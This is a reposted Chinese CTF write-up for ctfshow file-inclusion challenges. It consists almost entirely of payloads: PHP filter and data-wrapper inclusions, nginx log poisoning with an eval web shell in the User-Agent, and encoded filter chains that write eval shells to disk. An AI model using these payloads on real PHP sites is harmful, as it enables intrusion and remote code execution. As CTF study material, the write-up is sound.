自学内容网 自学内容网

文件包涵漏洞(ctfshow 无条件竞争)

Web78

payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

Web79

<?php system('cat flag.php');

Data协议写入内容读取

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

Web80

?file=/var/log/nginx/access.log

文件包含nignx日志文件

User-Agent: <?php eval($_POST[1]);?>

1=system(ls);

1=system('tac fl0g.php');

Web81

绕过php

?file=/var/log/nginx/access.log

文件包含nignx日志文件

User-Agent: <?=eval($_POST[1]);?>

1=system(ls);

1=system('tac fl0g.php');

Web87

Payload:

?file=php://filter/write=convert.base64-decode/resource=1.php   并且进行两次url编码

Payload:

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

再对posy上传的content二次base64加密

content=<?php @eval($_POST[1]);?>

content=UEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUcy9QZz09

访问1.php

1=system(ls);

1=system('tac fl0g.php');

Web88

Data为协议:

<?php system('cat fl0g.php'); ?>

Base64加密后:

PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4

payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4

Web116

环境损坏

Web117

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=2.php

contents=?<hp pe@av(l_$OPTSa[aa]a;)>?

aaaa=system("tac f*");


原文地址:https://blog.csdn.net/m0_74402888/article/details/140656224

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!